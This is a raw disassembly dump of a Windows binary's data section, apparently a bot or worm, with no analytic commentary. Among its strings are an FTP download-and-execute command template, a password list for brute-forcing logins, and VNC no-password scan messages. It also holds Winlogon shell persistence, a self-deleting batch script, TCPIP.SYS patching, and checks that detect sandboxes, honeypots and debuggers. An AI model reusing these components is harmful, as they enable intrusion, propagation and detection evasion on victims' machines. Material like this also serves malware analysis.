aSFailedToSet_0 db '%s Failed to set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_41AA69+21D�o
align 4
aSSetSSSToS_ db '%s Set "%s\%s\%s" to "%s".',0 ; DATA XREF: sub_41AA69+1C4�o
align 4
aSFailedToSetSS db '%s Failed to set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_41AA69+11F�o
align 10h
aSSetSSSToD_ db '%s Set "%s\%s\%s" to "%d".',0 ; DATA XREF: sub_41AA69+B5�o
align 4
aSTotalShares_0 db '%s Total shares [%s: %d]',0 ; DATA XREF: sub_41AD33+365�o
align 4
aTotalSharesS_0 db ' Total shares [%s: %d]',0 ; DATA XREF: sub_41AD33+343�o
align 10h
aSNoSharesS_ db '%s No shares %s.',0 ; DATA XREF: sub_41AD33:loc_41B05D�o
align 4
aUnloading db 'Unloading',0 ; DATA XREF: sub_41AD33+289�o
align 10h
aCreated db 'created',0 ; DATA XREF: sub_41AD33+23E�o
aSTotalSharesSD db '%s Total shares %s: [%d]',0 ; DATA XREF: sub_41AD33+231�o
align 4
aTotalSharesSD db ' Total shares: [%s: %d]',0 ; DATA XREF: sub_41AD33+1CF�o
off_44777C dd offset dword_532520 ; DATA XREF: sub_41AD33+C9�o
; sub_41AD33+157�o ...
dword_447780 dd 53207325h, 65726168h, 73252073h, 3Ah ; sub_41AD33+256�o
aErased db 'erased',0 ; DATA XREF: sub_41AD33+34�o
; sub_41AD33:loc_41AEEB�o ...
align 4
aSTotalServices db '%s Total services stopped: %d',0 ; DATA XREF: sub_41B0B0+15E�o
align 4
aSNoServicesSto db '%s No services stopped.',0 ; DATA XREF: sub_41B0B0+136�o
aSTheSServiceWa db '%s The %s service was not started.',0 ; DATA XREF: sub_41B0B0+F0�o
align 4
aSSServiceStopp db '%s %s service stopped.',0 ; DATA XREF: sub_41B0B0+B2�o
align 4
aSTheSServiceDo db '%s The %s service does not exist.',0 ; DATA XREF: sub_41B0B0+75�o
align 10h
aSystemShutting db 'System shutting down.',0 ; DATA XREF: sub_41B226+10B�o
align 4
aS_3 db '"%s"',0 ; DATA XREF: sub_41B424+14�o
align 10h
aSDoneOk_ db '%s Done Ok.',0 ; DATA XREF: sub_41B824+64�o
aSDone_ db '%s Done.',0 ; DATA XREF: sub_41BB8F+300�o
align 4
dword_447868 dd 243F6A88h dd 85A308D3h, 13198A2Eh, 3707344h, 0A4093822h, 299F31D0h
dd 82EFA98h, 0EC4E6C89h, 452821E6h, 38D01377h, 0BE5466CFh
dd 34E90C6Ch, 0C0AC29B7h, 0C97C50DDh, 3F84D5B5h, 0B5470917h
dd 9216D5D9h, 8979FB1Bh
dword_4478B0 dd 0D1310BA6h dd 98DFB5ACh, 2FFD72DBh, 0D01ADFB7h, 0B8E1AFEDh, 6A267E96h
dd 0BA7C9045h, 0F12C7F99h, 24A19947h, 0B3916CF7h, 801F2E2h
dd 858EFC16h, 636920D8h, 71574E69h, 0A458FEA3h, 0F4933D7Eh
dd 0D95748Fh, 728EB658h, 718BCD58h, 82154AEEh, 7B54A41Dh
dd 0C25A59B5h, 9C30D539h, 2AF26013h, 0C5D1B023h, 286085F0h
dd 0CA417918h, 0B8DB38EFh, 8E79DCB0h, 603A180Eh, 6C9E0E8Bh
dd 0B01E8A3Eh, 0D71577C1h, 0BD314B27h, 78AF2FDAh, 55605C60h
dd 0E65525F3h, 0AA55AB94h, 57489862h, 63E81440h, 55CA396Ah
dd 2AAB10B6h, 0B4CC5C34h, 1141E8CEh, 0A15486AFh, 7C72E993h
dd 0B3EE1411h, 636FBC2Ah, 2BA9C55Dh, 741831F6h, 0CE5C3E16h
dd 9B87931Eh, 0AFD6BA33h, 6C24CF5Ch, 7A325381h, 28958677h
dd 3B8F4898h, 6B4BB9AFh, 0C4BFE81Bh, 66282193h, 61D809CCh
dd 0FB21A991h, 487CAC60h, 5DEC8032h, 0EF845D5Dh, 0E98575B1h
dd 0DC262302h, 0EB651B88h, 23893E81h, 0D396ACC5h, 0F6D6FF3h
dd 83F44239h, 2E0B4482h, 0A4842004h, 69C8F04Ah, 9E1F9B5Eh
dd 21C66842h, 0F6E96C9Ah, 670C9C61h, 0ABD388F0h, 6A51A0D2h
dd 0D8542F68h, 960FA728h, 0AB5133A3h, 6EEF0B6Ch, 137A3BE4h
dd 0BA3BF050h, 7EFB2A98h, 0A1F1651Dh, 39AF0176h, 66CA593Eh
dd 82430E88h, 8CEE8619h, 456F9FB4h, 7D84A5C3h, 3B8B5EBEh
dd 0E06F75D8h, 85C12073h, 401A449Fh, 56C16AA6h, 4ED3AA62h
dd 363F7706h, 1BFEDF72h, 429B023Dh, 37D0D724h, 0D00A1248h
dd 0DB0FEAD3h, 49F1C09Bh, 75372C9h, 80991B7Bh, 25D479D8h
dd 0F6E8DEF7h, 0E3FE501Ah, 0B6794C3Bh, 976CE0BDh, 4C006BAh
dd 0C1A94FB6h, 409F60C4h, 5E5C9EC2h, 196A2463h, 68FB6FAFh
dd 3E6C53B5h, 1339B2EBh, 3B52EC6Fh, 6DFC511Fh, 9B30952Ch
dd 0CC814544h, 0AF5EBD09h, 0BEE3D004h, 0DE334AFDh, 660F2807h
dd 192E4BB3h, 0C0CBA857h, 45C8740Fh, 0D20B5F39h, 0B9D3FBDBh
dd 5579C0BDh, 1A60320Ah, 0D6A100C6h, 402C7279h, 679F25FEh
dd 0FB1FA3CCh, 8EA5E9F8h, 0DB3222F8h, 3C7516DFh, 0FD616B15h
dd 2F501EC8h, 0AD0552ABh, 323DB5FAh, 0FD238760h, 53317B48h
dd 3E00DF82h, 9E5C57BBh, 0CA6F8CA0h, 1A87562Eh, 0DF1769DBh
dd 0D542A8F6h, 287EFFC3h, 0AC6732C6h, 8C4F5573h, 695B27B0h
dd 0BBCA58C8h, 0E1FFA35Dh, 0B8F011A0h, 10FA3D98h, 0FD2183B8h
dd 4AFCB56Ch, 2DD1D35Bh, 9A53E479h, 0B6F84565h, 0D28E49BCh
dd 4BFB9790h, 0E1DDF2DAh, 0A4CB7E33h, 62FB1341h, 0CEE4C6E8h
dd 0EF20CADAh, 36774C01h, 0D07E9EFEh, 2BF11FB4h, 95DBDA4Dh
dd 0AE909198h, 0EAAD8E71h, 6B93D5A0h, 0D08ED1D0h, 0AFC725E0h
dd 8E3C5B2Fh, 8E7594B7h, 8FF6E2FBh, 0F2122B64h, 8888B812h
dd 900DF01Ch, 4FAD5EA0h, 688FC31Ch, 0D1CFF191h, 0B3A8C1ADh
dd 2F2F2218h, 0BE0E1777h, 0EA752DFEh, 8B021FA1h, 0E5A0CC0Fh
dd 0B56F74E8h, 18ACF3D6h, 0CE89E299h, 0B4A84FE0h, 0FD13E0B7h
dd 7CC43B81h, 0D2ADA8D9h, 165FA266h, 80957705h, 93CC7314h
dd 211A1477h, 0E6AD2065h, 77B5FA86h, 0C75442F5h, 0FB9D35CFh
dd 0EBCDAF0Ch, 7B3E89A0h, 0D6411BD3h, 0AE1E7E49h, 250E2Dh
dd 2071B35Eh, 226800BBh, 57B8E0AFh, 2464369Bh, 0F009B91Eh
dd 5563911Dh, 59DFA6AAh, 78C14389h, 0D95A537Fh, 207D5BA2h
dd 2E5B9C5h, 83260376h, 6295CFA9h, 11C81968h, 4E734A41h
dd 0B3472DCAh, 7B14A94Ah, 1B510052h, 9A532915h, 0D60F573Fh
dd 0BC9BC6E4h, 2B60A476h, 81E67400h, 8BA6FB5h, 571BE91Fh
dd 0F296EC6Bh, 2A0DD915h, 0B6636521h, 0E7B9F9B6h, 0FF34052Eh
dd 0C5855664h, 53B02D5Dh, 0A99F8FA1h, 8BA4799h, 6E85076Ah
dd 4B7A70E9h, 0B5B32944h, 0DB75092Eh, 0C4192623h, 0AD6EA6B0h
dd 49A7DF7Dh, 9CEE60B8h, 8FEDB266h, 0ECAA8C71h, 699A17FFh
dd 5664526Ch, 0C2B19EE1h, 193602A5h, 75094C29h, 0A0591340h
dd 0E4183A3Eh, 3F54989Ah, 5B429D65h, 6B8FE4D6h, 99F73FD6h
dd 0A1D29C07h, 0EFE830F5h, 4D2D38E6h, 0F0255DC1h, 4CDD2086h
dd 8470EB26h, 6382E9C6h, 21ECC5Eh, 9686B3Fh, 3EBAEFC9h
dd 3C971814h, 6B6A70A1h, 687F3584h, 52A0E286h, 0B79C5305h
dd 0AA500737h, 3E07841Ch, 7FDEAE5Ch, 8E7D44ECh, 5716F2B8h
dd 0B03ADA37h, 0F0500C0Dh, 0F01C1F04h, 200B3FFh, 0AE0CF51Ah
dd 3CB574B2h, 25837A58h, 0DC0921BDh, 0D19113F9h, 7CA92FF6h
dd 94324773h, 22F54701h, 3AE5E581h, 37C2DADCh, 0C8B57634h
dd 9AF3DDA7h, 0A9446146h, 0FD0030Eh, 0ECC8C73Eh, 0A4751E41h
dd 0E238CD99h, 3BEA0E2Fh, 3280BBA1h, 183EB331h, 4E548B38h
dd 4F6DB908h, 6F420D03h, 0F60A04BFh, 2CB81290h, 24977C79h
dd 5679B072h, 0BCAF89AFh, 0DE9A771Fh, 0D9930810h, 0B38BAE12h
dd 0DCCF3F2Eh, 5512721Fh, 2E6B7124h, 501ADDE6h, 9F84CD87h
dd 7A584718h, 7408DA17h, 0BC9F9ABCh, 0E94B7D8Ch, 0EC7AEC3Ah
dd 0DB851DFAh, 63094366h, 0C464C3D2h, 0EF1C1847h, 3215D908h
dd 0DD433B37h, 24C2BA16h, 12A14D43h, 2A65C451h, 50940002h
dd 133AE4DDh, 71DFF89Eh, 10314E55h, 81AC77D6h, 5F11199Bh
dd 43556F1h, 0D7A3C76Bh, 3C11183Bh, 5924A509h, 0F28FE6EDh
dd 97F1FBFAh, 9EBABF2Ch, 1E153C6Eh, 86E34570h, 0EAE96FB1h
dd 860E5E0Ah, 5A3E2AB3h, 771FE71Ch, 4E3D06FAh, 2965DCB9h
dd 99E71D0Fh, 803E89D6h, 5266C825h, 2E4CC978h, 9C10B36Ah
dd 0C6150EBAh, 94E2EA78h, 0A5FC3C53h, 1E0A2DF4h, 0F2F74EA7h
dd 361D2B3Dh, 1939260Fh, 19C27960h, 5223A708h, 0F71312B6h
dd 0EBADFE6Eh, 0EAC31F66h, 0E3BC4595h, 0A67BC883h, 0B17F37D1h
dd 18CFF28h, 0C332DDEFh, 0BE6C5AA5h, 65582185h, 68AB9802h
dd 0EECEA50Fh, 0DB2F953Bh, 2AEF7DADh, 5B6E2F84h, 1521B628h
dd 29076170h, 0ECDD4775h, 619F1510h, 13CCA830h, 0EB61BD96h
dd 334FE1Eh, 0AA0363CFh, 0B5735C90h, 4C70A239h, 0D59E9E0Bh
dd 0CBAADE14h, 0EECC86BCh, 60622CA7h, 9CAB5CABh, 0B2F3846Eh
dd 648B1EAFh, 19BDF0CAh, 0A02369B9h, 655ABB50h, 40685A32h
dd 3C2AB4B3h, 319EE9D5h, 0C021B8F7h, 9B540B19h, 875FA099h
dd 95F7997Eh, 623D7DA8h, 0F837889Ah, 97E32D77h, 11ED935Fh
dd 16681281h, 0E358829h, 0C7E61FD6h, 96DEDFA1h, 7858BA99h
dd 57F584A5h, 1B227263h, 9B83C3FFh, 1AC24696h, 0CDB30AEBh
dd 532E3054h, 8FD948E4h, 6DBC3128h, 58EBF2EFh, 34C6FFEAh
dd 0FE28ED61h, 0EE7C3C73h, 5D4A14D9h, 0E864B7E3h, 42105D14h
dd 203E13E0h, 45EEE2B6h, 0A3AAABEAh, 0DB6C4F15h, 0FACB4FD0h
dd 0C742F442h, 0EF6ABBB5h, 654F3B1Dh, 41CD2105h, 0D81E799Eh
dd 86854DC7h, 0E44B476Ah, 3D816250h, 0CF62A1F2h, 5B8D2646h
dd 0FC8883A0h, 0C1C7B6A3h, 7F1524C3h, 69CB7492h, 47848A0Bh
dd 5692B285h, 95BBF00h, 0AD19489Dh, 1462B174h, 23820E00h
dd 58428D2Ah, 0C55F5EAh, 1DADF43Eh, 233F7061h, 3372F092h
dd 8D937E41h, 0D65FECF1h, 6C223BDBh, 7CDE3759h, 0CBEE7460h
dd 4085F2A7h, 0CE77326Eh, 0A6078084h, 19F8509Eh, 0E8EFD855h
dd 61D99735h, 0A969A7AAh, 0C50C06C2h, 5A04ABFCh, 800BCADCh
dd 9E447A2Eh, 0C3453484h, 0FDD56705h, 0E1E9EC9h, 0DB73DBD3h
dd 105588CDh, 675FDA79h, 0E3674340h, 0C5C43465h, 713E38D8h
dd 3D28F89Eh, 0F16DFF20h, 153E21E7h, 8FB03D4Ah, 0E6E39F2Bh
dd 0DB83ADF7h, 0E93D5A68h
dd 948140F7h, 0F64C261Ch, 94692934h, 411520F7h, 7602D4F7h
dd 0BCF46B2Eh, 0D4A20068h, 0D4082471h, 3320F46Ah, 43B7D4B7h
dd 500061AFh, 1E39F62Eh, 97244546h, 14214F74h, 0BF8B8840h
dd 4D95FC1Dh, 96B591AFh, 70F4DDD3h, 66A02F45h, 0BFBC09ECh
dd 3BD9785h, 7FAC6DD0h, 31CB8504h, 96EB27B3h, 55FD3941h
dd 0DA2547E6h, 0ABCA0A9Ah, 28507825h, 530429F4h, 0A2C86DAh
dd 0E9B66DFBh, 68DC1462h, 0D7486900h, 680EC0A4h, 27A18DEEh
dd 4F3FFEA2h, 0E887AD8Ch, 0B58CE006h, 7AF4D6B6h, 0AACE1E7Ch
dd 0D3375FECh, 0CE78A399h, 406B2A42h, 20FE9E35h, 0D9F385B9h
dd 0EE39D7ABh, 3B124E8Bh, 1DC9FAF7h, 4B6D1856h, 26A36631h
dd 0EAE397B2h, 3A6EFA74h, 0DD5B4332h, 6841E7F7h, 0CA7820FBh
dd 0FB0AF54Eh, 0D8FEB397h, 454056ACh, 0BA489527h, 55533A3Ah
dd 20838D87h, 0FE6BA9B7h, 0D096954Bh, 55A867BCh, 0A1159A58h
dd 0CCA92963h, 99E1DB33h, 0A62A4A56h, 3F3125F9h, 5EF47E1Ch
dd 9029317Ch, 0FDF8E802h, 4272F70h, 80BB155Ch, 5282CE3h
dd 95C11548h, 0E4C66D22h, 48C1133Fh, 0C70F86DCh, 7F9C9EEh
dd 41041F0Fh, 404779A4h, 5D886E17h, 325F51EBh, 0D59BC0D1h
dd 0F2BCC18Fh, 41113564h, 257B7834h, 602A9C60h, 0DFF8E8A3h
dd 1F636C1Bh, 0E12B4C2h, 2E1329Eh, 0AF664FD1h, 0CAD18115h
dd 6B2395E0h, 333E92E1h, 3B240B62h, 0EEBEB922h, 85B2A20Eh
dd 0E6BA0D99h, 0DE720C8Ch, 2DA2F728h, 0D0127845h, 95B794FDh
dd 647D0862h, 0E7CCF5F0h, 5449A36Fh, 877D48FAh, 0C39DFD27h
dd 0F33E8D1Eh, 0A476341h, 992EFF74h, 3A6F6EABh, 0F4F8FD37h
dd 0A812DC60h, 0A1EBDDF8h, 991BE14Ch, 0DB6E6B0Dh, 0C67B5510h
dd 6D672C37h, 2765D43Bh, 0DCD0E804h, 0F1290DC7h, 0CC00FFA3h
dd 0B5390F92h, 690FED0Bh, 667B9FFBh, 0CEDB7D9Ch, 0A091CF0Bh
dd 0D9155EA3h, 0BB132F88h, 515BAD24h, 7B9479BFh, 763BD6EBh
dd 37392EB3h, 0CC115979h, 8026E297h, 0F42E312Dh, 6842ADA7h
dd 0C66A2B3Bh, 12754CCCh, 782EF11Ch, 6A124237h, 0B79251E7h
dd 6A1BBE6h, 4BFB6350h, 1A6B1018h, 11CAEDFAh, 3D25BDD8h
dd 0E2E1C3C9h, 44421659h, 0A121386h, 0D90CEC6Eh, 0D5ABEA2Ah
dd 64AF674Eh, 0DA86A85Fh, 0BEBFE988h, 64E4C3FEh, 9DBC8057h
dd 0F0F7C086h, 60787BF8h, 6003604Dh, 0D1FD8346h, 0F6381FB0h
dd 7745AE04h, 0D736FCCCh, 83426B33h, 0F01EAB71h, 0B0804187h
dd 3C005E5Fh, 77A057BEh, 0BDE8AE24h, 55464299h, 0BF582E61h
dd 4E58F48Fh, 0F2DDFDA2h, 0F474EF38h, 8789BDC2h, 5366F9C3h
dd 0C8B38E74h, 0B475F255h, 46FCD9B9h, 7AEB2661h, 8B1DDF84h
dd 846A0E79h, 915F95E2h, 466E598Eh, 20B45770h, 8CD55591h
dd 0C902DE4Ch, 0B90BACE1h, 0BB8205D0h, 11A86248h, 7574A99Eh
dd 0B77F19B6h, 0E0A9DC09h, 662D09A1h, 0C4324633h, 0E85A1F02h
dd 9F0BE8Ch, 4A99A025h, 1D6EFE10h, 1AB93D1Dh, 0BA5A4DFh
dd 0A186F20Fh, 2868F169h, 0DCB7DA83h, 573906FEh, 0A1E2CE9Bh
dd 4FCD7F52h, 50115E01h, 0A70683FAh, 0A002B5C4h, 0DE6D027h
dd 9AF88C27h, 773F8641h, 0C3604C06h, 61A806B5h, 0F0177A28h
dd 0C0F586E0h, 6058AAh, 30DC7D62h, 11E69ED7h, 2338EA63h
dd 53C2DD94h, 0C2C21634h, 0BBCBEE56h, 90BCB6DEh, 0EBFC7DA1h
dd 0CE591D76h, 6F05E409h, 4B7C0188h, 39720A3Dh, 7C927C24h
dd 86E3725Fh, 724D9DB9h, 1AC15BB4h, 0D39EB8FCh, 0ED545578h
dd 8FCA5B5h, 0D83D7CD3h, 4DAD0FC4h, 1E50EF5Eh, 0B161E6F8h
dd 0A28514D9h, 6C51133Ch, 6FD5C7E7h, 56E14EC4h, 362ABFCEh
dd 0DDC6C837h, 0D79A3234h, 92638212h, 670EFA8Eh, 406000E0h
dd 3A39CE37h, 0D3FAF5CFh, 0ABC27737h, 5AC52D1Bh, 5CB0679Eh
dd 4FA33742h, 0D3822740h, 99BC9BBEh, 0D5118E9Dh, 0BF0F7315h
dd 0D62D1C7Eh, 0C700C47Bh, 0B78C1B6Bh, 21A19045h, 0B26EB1BEh
dd 6A366EB4h, 5748AB2Fh, 0BC946E79h, 0C6A376D2h, 6549C2C8h
dd 530FF8EEh, 468DDE7Dh, 0D5730A1Dh, 4CD04DC6h, 2939BBDBh
dd 0A9BA4650h, 0AC9526E8h, 0BE5EE304h, 0A1FAD5F0h, 6A2D519Ah
dd 63EF8CE2h, 9A86EE22h, 0C089C2B8h, 43242EF6h, 0A51E03AAh
dd 9CF2D0A4h, 83C061BAh, 9BE96A4Dh, 8FE51550h, 0BA645BD6h
dd 2826A2F9h, 0A73A3AE1h, 4BA99586h, 0EF5562E9h, 0C72FEFD3h
dd 0F752F7DAh, 3F046F69h, 77FA0A59h, 80E4A915h, 87B08601h
dd 9B09E6ADh, 3B3EE593h, 0E990FD5Ah, 9E34D797h, 2CF0B7D9h
dd 22B8B51h, 96D5AC3Ah, 17DA67Dh, 0D1CF3ED6h, 7C7D2D28h
dd 1F9F25CFh, 0ADF2B89Bh, 5AD6B472h, 5A88F54Ch, 0E029AC71h
dd 0E019A5E6h, 47B0ACFDh, 0ED93FA9Bh, 0E8D3C48Dh, 283B57CCh
dd 0F8D56629h, 79132E28h, 785F0191h, 0ED756055h, 0F7960E44h
dd 0E3D35E8Ch, 15056DD4h, 88F46DBAh, 3A16125h, 564F0BDh
dd 0C3EB9E15h, 3C9057A2h, 97271AECh, 0A93A072Ah, 1B3F6D9Bh
dd 1E6321F5h, 0F59C66FBh, 26DCF319h, 7533D928h, 0B155FDF5h
dd 3563482h, 8ABA3CBBh, 28517711h, 0C20AD9F8h, 0ABCC5167h
dd 0CCAD925Fh, 4DE81751h, 3830DC8Eh, 379D5862h, 9320F991h
dd 0EA7A90C2h, 0FB3E7BCEh, 5121CE64h, 774FBE32h, 0A8B6E37Eh
dd 0C3293D46h, 48DE5369h, 6413E680h, 0A2AE0810h, 0DD6DB224h
dd 69852DFDh, 9072166h, 0B39A460Ah, 6445C0DDh, 586CDECFh
dd 1C20C8AEh, 5BBEF7DDh, 1B588D40h, 0CCD2017Fh, 6BB4E3BBh
dd 0DDA26A7Eh, 3A59FF45h, 3E350A44h, 0BCB4CDD5h, 72EACEA8h
dd 0FA6484BBh, 8D6612AEh, 0BF3C6F47h, 0D29BE463h, 542F5D9Eh
dd 0AEC2771Bh, 0F64E6370h, 740E0D8Dh, 0E75B1357h, 0F8721671h
dd 0AF537D5Dh, 4040CB08h, 4EB4E2CCh, 34D2466Ah, 115AF84h
dd 0E1B00428h, 95983A1Dh, 6B89FB4h, 0CE6EA048h, 6F3F3B82h
dd 3520AB82h, 11A1D4Bh, 277227F8h, 611560B1h, 0E7933FDCh
dd 0BB3A792Bh, 344525BDh, 0A08839E1h, 51CE794Bh, 2F32C9B7h
dd 0A01FBAC9h, 0E01CC87Eh, 0BCC7D1F6h, 0CF0111C3h, 0A1E8AAC7h
dd 1A908749h, 0D44FBD9Ah, 0D0DADECBh, 0D50ADA38h, 339C32Ah
dd 0C6913667h, 8DF9317Ch, 0E0B12B4Fh, 0F79E59B7h, 43F5BB3Ah
dd 0F2D519FFh, 27D9459Ch, 0BF97222Ch, 15E6FC2Ah, 0F91FC71h
dd 9B941525h, 0FAE59361h, 0CEB69CEBh, 0C2A86459h, 12BAA8D1h
dd 0B6C1075Eh, 0E3056A0Ch, 10D25065h, 0CB03A442h, 0E0EC6E0Eh
dd 1698DB3Bh, 4C98A0BEh, 3278E964h, 9F1F9532h, 0E0D392DFh
dd 0D3A0342Bh, 8971F21Eh, 1B0A7441h, 4BA3348Ch, 0C5BE7120h
dd 0C37632D8h, 0DF359F8Dh, 9B992F2Eh, 0E60B6F47h, 0FE3F11Dh
dd 0E54CDA54h, 1EDAD891h, 0CE6279CFh, 0CD3E7E6Fh, 1618B166h
dd 0FD2C1D05h, 848FD2C5h, 0F6FB2299h, 0F523F357h, 0A6327623h
dd 93A83531h, 56CCCD02h, 0ACF08162h, 5A75EBB5h, 6E163697h
dd 88D273CCh, 0DE966292h, 81B949D0h, 4C50901Bh, 71C65614h
dd 0E6C6C7BDh, 327A140Ah, 45E1D006h, 0C3F27B9Ah, 0C9AA53FDh
dd 62A80F00h, 0BB25BFE2h, 35BDD2F6h, 71126905h, 0B2040222h
dd 0B6CBCF7Ch, 0CD769C2Bh, 53113EC0h, 1640E3D3h, 38ABBD60h
dd 2547ADF0h, 0BA38209Ch, 0F746CE76h, 77AFA1C5h, 20756060h
dd 85CBFE4Eh, 8AE88DD8h, 7AAAF9B0h, 4CF9AA7Eh, 1948C25Ch
dd 2FB8A8Ch, 1C36AE4h, 0D6EBE1F9h, 90D4F869h, 0A65CDEA0h
dd 3F09252Dh, 0C208E69Fh, 0B74E6132h, 0CE77E25Bh, 578FDFE3h
dd 3AC372E6h, 0
dd 0E7h dup(0)
off_448C50 dd offset a_0123456789abc ; DATA XREF: sub_41E8B1:loc_41E8B3�r
; "./0123456789abcdefghijklmnopqrstuvwxyzA"...
align 8
dword_448C58 dd 80h, 0Eh dup(0) dd 80000000h
a_0123456789abc db './0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',0
; DATA XREF: .text:off_448C50�o
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_41C143+66�o
align 4
aSThreadsList db '%s Threads List:',0 ; DATA XREF: sub_41C143+39�o
align 4
a02x02x02x02x02 db '%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x',0
; DATA XREF: sub_41CDE4+64�o
align 4
aSDoneToS db '%s done to %s',0 ; DATA XREF: sub_41EA1B+1BF�o
align 4
aSErrorSendin_0 db '%s Error sending to %s.',0 ; DATA XREF: sub_41EA1B+C7�o
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
; DATA XREF: sub_41EF5E+25�o
align 4
aShell_0 db 'Shell',0 ; DATA XREF: sub_41EF5E+20�o
align 8
a@echoOffRepe_0 db '@echo off',0Dh,0Ah ; DATA XREF: sub_41F331:loc_41F409�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41F331+D1�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'ping 0.0.0.0>nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 4
aSRemovemeIIII_ db '%s\removeMe%i%i%i%i.bat',0 ; DATA XREF: sub_41F331+73�o
aExplorer_exe db 'Explorer.exe',0 ; DATA XREF: sub_41F6B4+93�o
align 4
aImail8_001531N db '(IMail 8.00 153-1) NT-ESMTP Server X1',0 ; DATA XREF: sub_41FA42+64�o
align 4
aNepenthes db 'nepenthes',0 ; DATA XREF: sub_41FA42+5D�o
align 10h
aCurrentuser db 'currentuser',0 ; DATA XREF: sub_41FA42+56�o
aVmware db 'vmware',0 ; DATA XREF: sub_41FA42+4F�o
align 4
aHoneymule db 'HoneyMule',0 ; DATA XREF: sub_41FA42+48�o
align 10h
aHoneyd db 'honeyd',0 ; DATA XREF: sub_41FA42+41�o
align 4
aHoneyc db 'honeyc',0 ; DATA XREF: sub_41FA42+3A�o
align 10h
aHoney db 'honey',0 ; DATA XREF: sub_41FA42+33�o
align 4
aSnort db 'snort',0 ; DATA XREF: sub_41FA42+2C�o
align 10h
aSandbox db 'sandbox',0 ; DATA XREF: sub_41FA42+25�o
aRoo db 'roo',0 ; DATA XREF: sub_41FA42+1E�o
aTu4nh09smcg1hc db 'TU-4NH09SMCG1HC',0 ; DATA XREF: sub_41FA42+15�o
aInsidetm db '\InsideTm\',0 ; DATA XREF: sub_41FB18+23�o
align 4
aShowtray db 'ShowTray',0 ; DATA XREF: sub_41FB50+101�o
align 4
aInstallpath db 'InstallPath',0 ; DATA XREF: sub_41FB50+EC�o
aSoftwareVmware db 'SOFTWARE\VMware, Inc.\VMware Tools',0 ; DATA XREF: sub_41FB50+E0�o
align 4
aIsdebuggerpres db 'IsDebuggerPresent',0 ; DATA XREF: sub_41FB50:loc_41FB89�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_41FB50+1E�o
align 4
a_Ntice db '\\.\NTICE',0 ; DATA XREF: sub_41FCC3+12�o
align 4
a2_0: ; DATA XREF: sub_41FDB6+35�o
unicode 0, <2>,0
aS_book db '%s.book',0 ; DATA XREF: sub_41FE12+12�o
aSfc_os_dll db 'sfc_os.dll',0 ; DATA XREF: sub_41FE4C+24�o
align 4
aSTcpip_sysFixe db '%s TCPIP.SYS fixed, version %d.',0 ; DATA XREF: sub_41FE93+551�o
aSCannotOpenTcp db '%s Cannot open TCPIP.SYS, version %d.',0 ; DATA XREF: sub_41FE93+1EB�o
align 4
off_448FE4 dd offset word_622B72 ; DATA XREF: sub_41FE93+1C9�o
dword_448FE8 dd 99h dword_448FEC dd 0E5h dword_448FF0 dd 5 dword_448FF4 dd 0FCh dword_448FF8 dd 6 dword_448FFC dd 16h dword_449000 dd 0C8h dword_449004 dd 3 dword_449008 dd 0E8h aSTcpip_sysVers db '%s TCPIP.SYS version is wrong.',0 ; DATA XREF: sub_41FE93+94�o
align 4
aSDriversTcpip_ db '%s\drivers\tcpip.sys',0 ; DATA XREF: sub_41FE93+5E�o
align 4
aSFailedToConne db '%s Failed to connect to HTTP server.',0 ; DATA XREF: sub_42042B+1DE�o
align 4
aSCouldNotOpenA db '%s Could not open a connection.',0 ; DATA XREF: sub_42042B+1D2�o
aSInvalidUrl_ db '%s Invalid URL.',0 ; DATA XREF: sub_42042B+1BD�o
align 10h
aSFailedToGetRe db '%s Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_42042B:loc_4205D6�o
align 4
aSUrlVisited_ db '%s URL visited.',0 ; DATA XREF: sub_42042B+1A4�o
asc_4490E4 db '*/*',0 ; DATA XREF: sub_42042B+48�o
off_4490E8 dd offset a123 ; DATA XREF: .text:00421415�r
; .text:00421421�o
; "123"
dd offset a1234 ; "1234"
dd offset aLetmein ; "letmein"
dd offset aAdmin_0 ; "admin"
dd offset a1234567 ; "1234567"
dd offset aPassword ; "password"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset off_43CF04
dd offset aPass_0 ; "pass"
dd offset aMaster ; "master"
dd offset aQwerty ; "qwerty"
dd offset a12345678 ; "12345678"
dd offset a654321 ; "654321"
dd 0
dd 66B5217h
aNxSystemrootSy db '#NX',7,'%systemroot%\system32\cmd.exe',0
align 4
aExit db 'exit',0
align 4
word_449154 dw 1 ; DATA XREF: sub_42075C+24�r
; .text:004208B0�r
align 4
word_449158 dw 4 ; DATA XREF: sub_42075C+10�r
align 4
dword_44915C dd 6325h ; sub_420BEE+3B4�o ...
aCmdCEchoOpenSD db 'cmd /c echo open %s %d >> i &echo user %s %s >> i &echo get %s >>'
; DATA XREF: .text:00420AA6�o
db ' i &echo quit >> i &ftp -nv -s:i &%s &exit &exit',0
align 4
aSDDDD_exe db '%s%d%d%d%d.exe',0 ; DATA XREF: .text:00420A48�o
align 4
loc_4491E4: ; DATA XREF: .text:004208E5�o
; sub_420BEE+2C�o
jmp ebx
; ---------------------------------------------------------------------------
align 4
dword_4491E8 dd 0DFFh ; sub_420BEE+21�o
dword_4491EC dd 0EBFFh ; sub_420BEE+10�o
dword_4491F0 dd 201h dword_4491F4 dd 20424652h, 2E333030h, 0A383030h, 0aVncD_DSS db 'VNC%d.%d: %s - %s',0 ; DATA XREF: sub_420BEE+60D�o
align 4
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> i &echo user %s %s >> i &echo get %s >>'
; DATA XREF: sub_420BEE+384�o
; sub_420BEE+744�o
db ' i &echo quit >> i &ftp -nv -s:i &%s &exit',0
aVncD_DSNopass db 'VNC%d.%d: %s - (NoPass)',0 ; DATA XREF: sub_420BEE+256�o
